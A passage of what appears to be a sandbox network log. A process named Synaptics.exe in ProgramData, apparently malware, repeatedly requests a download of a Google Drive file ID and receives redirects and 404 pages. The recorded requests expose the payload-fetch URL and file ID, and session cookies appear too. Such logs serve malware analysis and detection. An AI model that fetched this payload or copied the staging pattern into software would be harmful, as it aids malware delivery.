                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    58192.168.2.449836142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:24 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:25 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6TLANqvCMWcSrkppG1c48bn83mKgqF89mNPCfLSJ0LsFV_ciBx8gsNBVBUadm-ah2Y
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:25 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-lh0Xnrz0v29jZ1yKny5Ggg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:25 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:25 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 69 6d 64 30 43 5a 69 73 48 38 32 39 30 30 62 74 67 46 68 35 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="timd0CZisH82900btgFh5w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:25 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    59192.168.2.449835142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:24 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:25 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-kHH4IWEqMq8ufUc5RTNUzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    60192.168.2.449838142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:25 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:25 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4XE9ltO5sP3N1Ar8PTH5TeZoZyYCHQYswm3HTkYY2aozOCHcnr1TUfkjZboyloQwjgjW0gL5E
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:25 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DrHxITUWqkpY9zOVZL--eQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:25 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:25 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 31 36 61 46 43 48 4b 6f 4e 42 79 76 58 4f 39 6e 58 57 35 72 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="416aFCHKoNByvXO9nXW5rw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:25 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    61192.168.2.449839142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:25 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:25 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-nJT7Dn9Kuslxx115pQ2gsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    62192.168.2.449841142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:25 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    63192.168.2.449842142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:26 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    64192.168.2.449847142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:26 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:26 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-_gKih3Ll_MmJwjoZKP7Sqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    65192.168.2.449848142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:26 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:26 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-GolrgSMSz8yArJ5u7Z0KVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    66192.168.2.449849142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:27 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:27 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-A0j5z4E_Gy8pYtv-TofBbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    67192.168.2.449851142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:27 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
